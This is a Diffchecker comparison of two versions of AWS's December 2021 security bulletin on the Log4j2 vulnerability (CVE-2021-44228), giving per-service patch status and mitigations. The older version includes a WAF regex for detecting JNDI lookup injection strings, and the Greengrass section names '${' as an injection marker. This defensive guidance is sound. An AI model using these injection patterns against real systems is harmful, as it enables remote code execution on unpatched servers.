Texte vergleichen

Finden Sie den Unterschied zwischen zwei Textdateien

Real-time diff

Unified diff

Collapse lines

Highlight change

Syntax highlighting

Onlinewerkzeuge

Diffchecker Desktop The most secure way to run Diffchecker. Get the Diffchecker Desktop app: your diffs never leave your computer!Get Desktop

AWS log4j bulletin

Created 3 years agoDiff never expires

32 lines

51 lines

Initial Publication Date: 2021/12/11 7:30 PM PDT

Update for Apache Log4j2 Issue (CVE-2021-44228)

Last Updated Date: 2021/12/12 9:40 PM PDT

AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We are actively monitoring this issue, and are working on addressing it for any AWS services which either use Log4j2 or provide it to customers as part of their service.

We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at https://logging.apache.org/log4j/2.x/download.html or their operating system’s software update mechanism.

We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at: https://logging.apache.org/log4j/2.x/download.html or their operating system’s software update mechanism.

It has been reported that using Log4j2 on JDKs after 8u121 or 8u191 (including JDK 11 and later) mitigates the issue, but this is only a partial mitigation. The only comprehensive solution is to upgrade Log4j2 to 2.15, and Log4j2 versions older than 2.15 should be considered affected regardless of the JDK distribution or version used.

Additional service-specific information is below.

If you need additional details or assistance, please contact AWS Support.

API Gateway

We are updating API Gateway to use a version of Log4j2 that mitigates the issue. You may observe periodic latency increases for some APIs during these updates.

AWS Greengrass

Updates for all Greengrass V2 components that use Apache Log4j2 are available for deployment since 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.

Updates for Greengrass versions 1.10 and 1.11 are expected to be available by 12/17/2021. Customers who use Stream Manager on these devices are recommended to update their devices as soon as the Greengrass binaries are made available for these versions. In the meantime, customers should verify that their custom lambda code using Stream Manager on Greengrass 1.10 or 1.11 does not use arbitrary stream names and file names (for the S3 exporter) outside of the customer’s control, e.g. a stream name or file name containing the text “${".

Amazon MQ

Amazon MQ has 2 areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).

We are applying required updates to the Amazon MQ service code to address the issue.

There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.x, which is not affected by this issue. RabbitMQ does not use Log4j2 and is not affected by this issue.

CloudFront

CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.

AWS Elastic Beanstalk

AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.

If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.

In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.

More information about security-related software updates for Amazon Linux is available at: https://alas.aws.amazon.com.

EMR

CVE-2021-44228 impacts Apache log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.

CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.

We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.

Lake Formation

Lake Formation service hosts are being proactively updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.

S3’s data ingress and egress is patched against the Log4j2 issue. We are working to apply the Log4j2 patch to the S3 systems that operate separately from S3’s data ingress and egress.

AWS SDK

The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.

AMS

We are actively monitoring this issue, and are working on addressing it for any AMS services that use Log4j2. We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at https://logging.apache.org/Log4j2/2.x/download.html (https://logging.apache.org/log4j/2.x/download.html) or by using their operating system's software update mechanism.

We are actively monitoring this issue, and are working on addressing it for any AMS services that use Log4j2. We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at https://logging.apache.org/log4j2/2.x/download.html or by using their operating system's software update mechanism.

AMS recommends deploying a Web Application Firewall (WAF) for all Internet-accessible application endpoints. The AWS WAF service can be configured to mitigate this issue by deploying the AWSManagedRulesAnonymousIpList rule-set (which blocks TOR Nodes) and adding a rule which utilizes the following Regex Pattern Match: (?i)\$\{jndi|%2525|%24\{jndi.

AMS recommends deploying a Web Application Firewall (WAF) for all Internet-accessible application endpoints. The AWS WAF service can be configured to provide an additional layer of defense against this issue by deploying the AWSManagedRulesAnonymousIpList rule-set (which contains rules to block sources known to anonymize client information, like TOR nodes) and the AWSManagedRulesKnownBadInputsRuleSet rule-set (which which inspects URI, request body, and commonly used headers to help block requests related to Log4j and other issues).

AMS will continue to monitor this issue and provide additional details and recommendations as they become available.

Amazon Neptune

Amazon Neptune includes the Apache Log4j2 library as a peripheral component, but the issue is not believed to impact Neptune users. Out of an abundance of caution, Neptune clusters will be automatically updated to use a version of Log4j2 that addresses the issue. Customers may observe intermittent events during update.

NICE

Due to an issue in the Apache Log4j library (CVE: https://www.randori.com/blog/cve-2021-44228/) included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version available on https://download.enginframe.com/ or update the Log4J library in your EnginFrame installation following the instructions on the support website https://support.nice-software.com/support/solutions/articles/11000111006-updating-log4j-from-2-13-to-2-15-0

Please feel free to contact us via https://support.nice-software.com

Kafka

Managed Streaming for Apache Kafka is aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use log4j > 2.0.0 library and are being patched where needed.

AWS Glue

AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.

AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If your ETL jobs load a specific version of Apache Log4j, then you are advised to update your scripts to use the latest version of Apache Log4j. If you use AWS Glue development endpoints to author your scripts, then you are advised update the Log4j version you use there as well.

AWS Glue is also proactively applying the updates to new Spark environment across all supported regions. If you have questions or would like additional assistance, please contact us through the AWS Support.

RDS

Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the the Apache Log4j library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components

Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.

OpenSearch

Amazon OpenSearch Service is deploying a service software update, version R20211203-P2, which contains an updated version of Log4j2. We will notify customers as the update becomes available in their regions, and update this bulletin once it is available worldwide.

Gespeicherten Diffs

Original text

Datei öffnen

Initial Publication Date: 2021/12/11 7:30 PM PDT
AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We are actively monitoring this issue, and are working on addressing it for any AWS services which either use Log4j2 or provide it to customers as part of their service.
We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at https://logging.apache.org/log4j/2.x/download.html or their operating system’s software update mechanism.
It has been reported that using Log4j2 on JDKs after 8u121 or 8u191 (including JDK 11 and later) mitigates the issue, but this is only a partial mitigation. The only comprehensive solution is to upgrade Log4j2 to 2.15, and Log4j2 versions older than 2.15 should be considered affected regardless of the JDK distribution or version used.
Additional service-specific information is below.
If you need additional details or assistance, please contact AWS Support.
EMR
CVE-2021-44228 impacts Apache log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
Lake Formation
Lake Formation service hosts are being proactively updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.
S3
S3’s data ingress and egress is patched against the Log4j2 issue. We are working to apply the Log4j2 patch to the S3 systems that operate separately from S3’s data ingress and egress.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AMS
We are actively monitoring this issue, and are working on addressing it for any AMS services that use Log4j2. We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at https://logging.apache.org/Log4j2/2.x/download.html (https://logging.apache.org/log4j/2.x/download.html) or by using their operating system's software update mechanism.
AMS recommends deploying a Web Application Firewall (WAF) for all Internet-accessible application endpoints. The AWS WAF service can be configured to mitigate this issue by deploying the AWSManagedRulesAnonymousIpList rule-set (which blocks TOR Nodes) and adding a rule which utilizes the following Regex Pattern Match: (?i)\$\{jndi|%2525|%24\{jndi.
AMS will continue to monitor this issue and provide additional details and recommendations as they become available.
Amazon Neptune
Amazon Neptune includes the Apache Log4j2 library as a peripheral component, but the issue is not believed to impact Neptune users. Out of an abundance of caution, Neptune clusters will be automatically updated to use a version of Log4j2 that addresses the issue. Customers may observe intermittent events during update.
NICE
Due to an issue in the Apache Log4j library (CVE: https://www.randori.com/blog/cve-2021-44228/) included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version available on https://download.enginframe.com/ or update the Log4J library in your EnginFrame installation following the instructions on the support website https://support.nice-software.com/support/solutions/articles/11000111006-updating-log4j-from-2-13-to-2-15-0
Please feel free to contact us via https://support.nice-software.com
Kafka
Managed Streaming for Apache Kafka is aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use log4j > 2.0.0 library and are being patched where needed.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If your ETL jobs load a specific version of Apache Log4j, then you are advised to update your scripts to use the latest version of Apache Log4j. If you use AWS Glue development endpoints to author your scripts, then you are advised update the Log4j version you use there as well.
AWS Glue is also proactively applying the updates to new Spark environment across all supported regions. If you have questions or would like additional assistance, please contact us through the AWS Support.
RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the the Apache Log4j library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components

Geänderter text

Datei öffnen

Update for Apache Log4j2 Issue (CVE-2021-44228)
Last Updated Date: 2021/12/12 9:40 PM PDT
AWS is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We are actively monitoring this issue, and are working on addressing it for any AWS services which either use Log4j2 or provide it to customers as part of their service.
We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at: https://logging.apache.org/log4j/2.x/download.html or their operating system’s software update mechanism.
It has been reported that using Log4j2 on JDKs after 8u121 or 8u191 (including JDK 11 and later) mitigates the issue, but this is only a partial mitigation. The only comprehensive solution is to upgrade Log4j2 to 2.15, and Log4j2 versions older than 2.15 should be considered affected regardless of the JDK distribution or version used.
Additional service-specific information is below.
If you need additional details or assistance, please contact AWS Support.
API Gateway
We are updating API Gateway to use a version of Log4j2 that mitigates the issue. You may observe periodic latency increases for some APIs during these updates.
AWS Greengrass
Updates for all Greengrass V2 components that use Apache Log4j2 are available for deployment since 12/10/2021. These components are: Stream Manager (2.0.14) and Secure Tunneling (1.0.6). AWS recommends that customers who are using these Greengrass components deploy the latest versions to their devices.
Updates for Greengrass versions 1.10 and 1.11 are expected to be available by 12/17/2021. Customers who use Stream Manager on these devices are recommended to update their devices as soon as the Greengrass binaries are made available for these versions. In the meantime, customers should verify that their custom lambda code using Stream Manager on Greengrass 1.10 or 1.11 does not use arbitrary stream names and file names (for the S3 exporter) outside of the customer’s control, e.g. a stream name or file name containing the text “${".
Amazon MQ
Amazon MQ has 2 areas of consideration regarding the recently disclosed issue (CVE-2021-44228) relating to the Apache Log4j2 library: Amazon MQ service code (AWS specific) and open source code (Apache ActiveMQ and RabbitMQ message brokers).
We are applying required updates to the Amazon MQ service code to address the issue.
There are no updates required to the open source message brokers. All versions of Apache ActiveMQ offered in Amazon MQ use Log4j version 1.x, which is not affected by this issue. RabbitMQ does not use Log4j2 and is not affected by this issue.
CloudFront
CloudFront services have been updated to mitigate the issues identified in CVE-2021-44228. The CloudFront request handling services that run in our POPs are not written in Java and therefore were not affected by this issue.
AWS Elastic Beanstalk
AWS Elastic Beanstalk installs Log4j from the Amazon Linux default package repositories in its Tomcat platforms for Amazon Linux 1 and Amazon Linux 2. The versions of Log4j available in the Amazon Linux 1 and Amazon Linux 2 repositories are not affected by CVE-2021-44228.
If you have made configuration changes to your application’s use of Log4j, then we recommend that you take action to update your application’s code to mitigate this issue.
In accordance with our normal practices, if patched versions of these default package repository versions are released, Elastic Beanstalk will include the patched version in the next Tomcat platform version release for Amazon Linux 1 and Amazon Linux 2.
More information about security-related software updates for Amazon Linux is available at: https://alas.aws.amazon.com.
EMR
CVE-2021-44228 impacts Apache Log4j versions between 2.0 and 2.14.1 when processing inputs from untrusted sources. EMR clusters launched with EMR 5 and EMR 6 releases include open source frameworks such as Apache Hive, Flink, HUDI, Presto, and Trino, which use these versions of Apache Log4j. When you launch a cluster with EMR’s default configuration, it does not process inputs from untrusted sources.
We are actively working on building an update that mitigates the issue discussed in CVE-2021-44228 when open source frameworks installed on your EMR cluster process information from untrusted sources.
Lake Formation
Lake Formation service hosts are being proactively updated to the latest version of Log4j to address the issue with versions referenced in CVE-2021-44228.
S3
S3’s data ingress and egress is patched against the Log4j2 issue. We are working to apply the Log4j2 patch to the S3 systems that operate separately from S3’s data ingress and egress.
AWS SDK
The AWS SDK for Java uses a logging facade, and does not have a runtime dependency on Log4j. We do not currently believe any AWS SDK for Java changes need to be made regarding this issue.
AMS
We are actively monitoring this issue, and are working on addressing it for any AMS services that use Log4j2. We strongly encourage customers who manage environments containing Log4j2 to update to the latest version, available at https://logging.apache.org/log4j2/2.x/download.html or by using their operating system's software update mechanism.
AMS recommends deploying a Web Application Firewall (WAF) for all Internet-accessible application endpoints. The AWS WAF service can be configured to provide an additional layer of defense against this issue by deploying the AWSManagedRulesAnonymousIpList rule-set (which contains rules to block sources known to anonymize client information, like TOR nodes) and the AWSManagedRulesKnownBadInputsRuleSet rule-set (which which inspects URI, request body, and commonly used headers to help block requests related to Log4j and other issues).
AMS will continue to monitor this issue and provide additional details and recommendations as they become available.
Amazon Neptune
Amazon Neptune includes the Apache Log4j2 library as a peripheral component, but the issue is not believed to impact Neptune users. Out of an abundance of caution, Neptune clusters will be automatically updated to use a version of Log4j2 that addresses the issue. Customers may observe intermittent events during update.
NICE
Due to an issue in the Apache Log4j library (CVE: https://www.randori.com/blog/cve-2021-44228/) included in EnginFrame from version 2020.0 to 2021.0-r1307, NICE recommends that you upgrade to the latest EnginFrame version available on https://download.enginframe.com/ or update the Log4J library in your EnginFrame installation following the instructions on the support website https://support.nice-software.com/support/solutions/articles/11000111006-updating-log4j-from-2-13-to-2-15-0
Please feel free to contact us via https://support.nice-software.com
Kafka
Managed Streaming for Apache Kafka is aware of the recently disclosed issue (CVE-2021-44228) relating to the Apache log4j2 library and are applying updates as required. Please note that the builds of Apache Kafka and Apache Zookeeper offered in MSK currently use Log4j 1.2.17, which is not affected by this issue. Some MSK-specific service components use log4j > 2.0.0 library and are being patched where needed.
AWS Glue
AWS Glue is aware of the recently disclosed security issue relating to the open-source Apache “Log4j2" utility (CVE-2021-44228). We have updated our control plane fleet that serves AWS Glue APIs for all supported Glue versions.
AWS Glue creates a new Spark environment that is isolated at the network and management level from all other Spark environments inside the AWS Glue service account. Your ETL jobs are executed on a single tenant environment. If your ETL jobs load a specific version of Apache Log4j, then you are advised to update your scripts to use the latest version of Apache Log4j. If you use AWS Glue development endpoints to author your scripts, then you are advised update the Log4j version you use there as well.
AWS Glue is also proactively applying the updates to new Spark environment across all supported regions. If you have questions or would like additional assistance, please contact us through the AWS Support.
RDS
Amazon RDS and Amazon Aurora are actively addressing all service usage of Log4j2 by applying updates. RDS-built relational database engines do not include the Apache Log4j library. Where upstream vendors are involved, we are applying their recommended mitigation. Customers may observe intermittent events during update of internal components.
OpenSearch
Amazon OpenSearch Service is deploying a service software update, version R20211203-P2, which contains an updated version of Log4j2. We will notify customers as the update becomes available in their regions, and update this bulletin once it is available worldwide.

Words removed	25
Total words	832
Words removed (%)	3.00

Words added	517
Total words	1324
Words added (%)	39.05